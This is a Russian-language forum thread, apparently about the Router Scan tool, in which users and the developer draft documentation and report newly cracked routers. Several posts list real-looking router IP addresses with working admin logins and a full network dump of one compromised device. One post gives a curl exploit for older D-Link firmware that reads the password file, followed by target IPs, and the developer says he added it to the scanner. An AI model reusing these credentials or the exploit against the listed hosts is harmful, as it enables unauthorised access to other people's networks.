BUFFALO: DD-WRT, model: WHR-HP-G300N http://109.199.230.83:8080/ admin:samsung http://rghost.net/6FynnwyyM , http://rghost.net/64JRLRCBn BUFFALO: DD-WRT, model: WZR-HP-G300NH http://93.183.151.143:8080/ admin:admin http://rghost.net/62Bt7N6pk
Уже оффлайн. Да, будет, я в нём разобрался. Добавил. Хочу предупредить тех, кто скидывает новые роутеры, на буднях у меня практически нет времени на разработку, пилю в основном на выходных. Посмотрите в настройках, генерация гудов могла отключиться.
Здравствуйте, вчера пользовался программой, была выбрана вкладка Good Results, появилась ошибка со значением 1469( к сожалению случайно закрыл не сделал скрин), удачные результаты программа больше не сохраняла, в таблице(в которую все сохранил) и в самой программе их было ровно 1469. У меня одного такая проблема?
Нашел желающих? Могу предложить помощь. - скриншоты делать умею - Документации с скриншотами в ворде приходилось делать вот пример - знаю в среднем качестве HTML, CSS - могу снять обучающее видео
Вы первый, кто предложил. Требования самые минимальные - текстовое описание функций + скриншоты к ним. В HTML я уже сам всё оформлю, и допишу в нужных местах, где есть "подводные камни". Надеюсь на вашу безвозмездную помощь! Результаты можно скидывать на файлообменник, и прямо сюда в тему. Было бы здорово, если каждый добавил что-то от себя, дополнив документацию, поскольку в этой теме давались ответы на многие вопросы. И я уверен, что многие участники темы уже достаточно компетентны в этом. P.S. в документации упомяну никнеймы тех, кто помогал (по желанию конечно)
ну и отлично.. Spoiler прочел все 60 страниц и впринципе у всех одни и те же вопросы. а про пароль к архиву который не могут найти на сайте и комментарий про танки.. - смеялся долго Тогда с Вашего позволения оформлю все в Word. Можно получить в личку Ваши данные(скупе,аська) для уточнения некоторых вопросов (в которых сам запутался) И желательно получить ссылку на последнюю версию что бы скриншоты были актуальные
Уже добавил. Code: Address: http://195.49.185.19/ Time: 94 ms Authorization: admin:admin Device: TP-LINK TL-ER6120 BSSID: <not implemented> LAN IP: 10.49.1.11 LAN Subnet Mask: 255.255.255.0 WAN IP: 195.49.185.19 WAN Subnet Mask: 255.255.255.248 WAN Gateway: 195.49.185.17 Domain Name Servers: 77.243.0.12 77.243.0.27 Поскольку беспроводные с такой прошивкой мне ещё не встречались, оставил <not implemented> в BSSID.
Начал писать, критика принимается Spoiler: Инструкция http://rghost.ru/8YfcGw5hm Как сюда прикреплять файлы, без обменника ?
Небольшое уточнение: "В корне папки с программой всего 2 файла..." - это отностися к бета-версии. В релизе (по крайней мере, так было раньше) будет и libeay32.dll, и msvcr100.dll. Соответственно, ошибок, связанных с отсутствием библиотек, быть не должно - стоит ли писать об этом в документации? Spoiler: В Инструкцию Из коментариев на сайте программы: Scanning modules: Router Scan (main) - Основной модуль сканирования роутеров, отвечает за подбор пароля к админке, и за получение информации Detect proxy servers - Обнаруживает прокси серверы протокола HTTP, и оповещает в случае удачи - в колонку Type в скобках будет дописано "proxy server", а в колонку WAN IP Address - реальный внешний адрес прокси сервера. Use HNAP 1.0 - Проверяет хост на наличие поддержки протокола Home Network Administration Protocol v1.0 и уязвимостей в нём. В случае обнаружения поддержки запишет "HNAP Info" в столбец Type. Если уязвимость будет обнаружена - запишет также настройки беспроводной сети. SQLite Manager RCE - Данный модуль добавлен в качестве бонуса, к роутерам отношения не имеет. Он определяет уязвимые сервера SQLite, в которых имеется уязвимость выполнения произвольного PHP кода. В случае обнаружения запишет информацию в колонку Comment. Hudson Java Servlet - Данный модуль добавлен в качестве бонуса, к роутерам отношения не имеет. Он определяет уязвимые сервера Hudson CI (а также Jenkins CI), в которых имеется уязвимость выполнения произвольного Java кода. В случае обнаружения запишет информацию в колонку Comment. Также, важно знать, что модули работают друг за другом - они могут перезаписать информацию в колонках, которую получил предыдущий модуль. Spoiler: В Инструкцию Из коментариев на сайте программы: Режимы сканирования: Режим Normal. Оптимизирован для работы через беспроводную сеть (т.е. когда вы подключены через Wi-Fi), также он не забивает канал соединениями и удобен, когда вам нужно во время сканирования пользоваться интернетом. Технические характеристики: задержка 15 мс между каждой парой IP/порт Режим Fast Scan. Оптимизирован для работы через Ethernet (когда вы подключены по кабелю). Данный режим может вызвать проблемы, когда вы используете Wi-Fi в качестве основного соединения. Технические характеристики: задержка 15 мс между каждым IP-адресом, все указанные порты проверяются в один момент Режим Ultra Fast. Может применяться при высокоскоростном соединении (1 Гбит/с и выше) на высокопроизводительных машинах. Используйте этот режим на свой страх и риск, т.к. на неподходящей конфигурации системы, он может оборвать соединение с интернетом на долгое время, вызвать отказ в обслуживании вашего интернет провайдера, или нанести вред сетевому адаптеру. Технические характеристики: без задержек, задействуются сразу все доступные потоки
Spoiler: В Инструкцию 2 – Max. Threads - время жизни потока (мс) { в config.ini - Threads=300 } тут скорее не время жизни, а максимальное количество потоков...
Внёс некоторые правки и совместил в одном архиве. http://rghost.ru/7sN4RTKdl Пожелания и замечания в перемешку: 1. Не нужно составлять полной инструкции - о структуре, разделах и т.п. я позабочусь сам 2. Относительно разделов "Работа с полученными данными" и "Использование полученных данных", инструкция должна учитывать, что программа используется в легитимных целях. Упомянуть различные фичи вроде VPN и проникновения в сети - можно, но только в рамках пентестинга. Инструкция должна быть больше ориентирована на помощь при работе с программой, но не с роутерами (кому надо - сам найдёт) Spoiler: Цитата Для тех кто играет в танки пишите через “-” 3. Подсказки для непонимающих пользователей лучше не добавлять / минимизировать Spoiler: Цитата *Добавить бы вкладку в которой были бы только все НЕ успешно вскрытые роутеры, для повторного пересканирования (добавление роутера, найденный хак,….). 4. Зачем писать пожелания/комментарии в инструкцию? Вы ведь пишете не мне лично, а людям. 5. Не делайте рисунки очень большими, делайте окно так, чтобы были видны все необходимые / описываемые элементы 6. Окна и их элементы лучше описывать по очереди, при необходимости ссылаясь на разделы ниже/выше. Рекурсивный метод описания хуже воспринимается читателем Ну вот, на первый взгляд как-то так.
binarymaster, вопрос по поводу вебкамер (ipкамер,видеорегистраторов и прочего) при скане часто попадаются они, но практически не детектируются... в чем вопрос то (даже пожелание): есть ли в планах сделать поддержку камер (по сути она и так есть, но более побольше внимания им уделить), правда там есть свои нюансы: для просмотра в браузере большинство заточено под IE, каждый вендор имеет свой плагин, но для успешной авторизации плагин не нужен.. P.S.: перечитал - сам не понял что написал (немного пьян), но фак остаётся фактом, поддержка камер значительно бы увеличила привлекательность вашей программы... так же готов предоставить посильную помощ если возникнут какие трудности в реализации....
Я все таки хочу составить полную (дается мне она и останется в word ) Пожелания и Вопросы отправлю лично Вам на почту Спасибо за дополнения. Поправлю после получения финальной версии. Продолжаю писать. Скоро будет финальная версия. Принимаю критику. Spoiler: Инструкция beta v0.2 http://rghost.ru/87DFH4M6v Вопрос ко всем. Нужна ли подобная инструкция ? Spoiler: Применение RS http://rghost.ru/8Bfm9gc6H Если да то нужна помощь, я не во всем разбираюсь. Для чего? - может статью напишу.
Уязвимость в старых прошивках DIR-300 (2.12, 2.13) и DIR-600 (2.12-2.14): http://www.s3cur1ty.de/m1adv2013-003 tl;dr Получение пароля: Code: curl --data "cmd=cat /var/passwd" http://ip/command.php http://79.l65.122.75/ http://89.96.28.143:808O/ http://82.176.188.42:808O/
Ну хорошо. Просто учтите, что всё это будет переработано моим мозгом для помещения в документацию в нужном формате.) Spoiler: Цитата 6 – Search – хз……. Расписывать надо? Поиск по выбранной таблице. Можно искать совпадение текста (с учётом регистра или без) выше или ниже выбранной ячейки, либо вывести сразу все результаты поиска (галка All). Spoiler: Цитата phpMyAdmin RCE – Нужно описание Проверка уязвимости phpMyAdmin на выполнение произвольного php кода (только проверка, эксплойт пока не реализован). https://www.exploit-db.com/exploits/8921/ Spoiler: Цитата 9 – Вкладки с полученными данными: 1 – все найденные 2 – успешно вскрытые 3 – хз……. 3 - таблица, содержащая результаты поиска Spoiler: Цитата 1) SYN snd times хз……. Сколько раз отправлять пакет TCP SYN (запрос на соединение с портом). Spoiler: Цитата 1) Silent Mode хз….. Тихий режим позволяет запустить программу без видимого окна, и сразу запустить сканирование. При этом выводится значок в системном лотке, по которому можно показать окно, и после завершения сканирования результаты будут сохранены в файл (даже если автосохранение выключено). Spoiler: Цитата 1) Галочка + функционал хз….. Позволяет сохранять результаты на диск в автоматическом режиме (по определённому интервалу и в выбранном формате, файлы сохраняются в папку с программой). Spoiler: Цитата 1) Хз …….. Custom detection page - позволяет задать иную страницу устройства, которая будет изначально запрошена для определения модели. Имеет смысл использовать для устройств Cisco SPA, которые по умолчанию просят логин пользователя "spa user", а для логина под админом требуется использовать адрес http://IPaddr/admin/ на котором будет выдано предложение "spa admin". Spoiler: Цитата 1) Suggest хз…………. Предположить PIN код, согласно OUI мак адреса. Spoiler: Цитата 4) GrabfromJSW (принцип работы ?? Кто разобрался) Считывает BSSID-ы из таблицы запущенной программы Atheros JumpStart Wireless (также известной как TP-LINK QSS). Spoiler: Цитата 5) Algorihms – известные алгоритмы подбора пинов Позволяет посмотреть, какие алгоритмы поддерживаются генератором, встречающиеся OUI мак адресов, техническая информация по алгоритмам и ссылки на них. Spoiler: Цитата 1) Scan selected table Если в выбранной таблице есть роутеры с PIN-кодами, данная функция позволит проверить, какие пин коды соответствуют реализованным алгоритмам генерации. Результаты будут выведены в колонку комментариев.
Пишите, пригодится. Если какие-либо камеры содержат настройки беспроводной сети - присылайте их IP адреса для изучения и добавления в поддержку. Я никогда не планирую добавление моделей, я добавляю в поддержку то, что мне присылают, либо что нахожу сам. Благодарю! Исследую...
Уязвимость присутствует, но файл /var/passwd на всех устройствах пуст. Есть идеи? UPD: /var/etc/httpasswd тоже. UPD 2: Разобрался, добавил эксплойт в Router Scan.
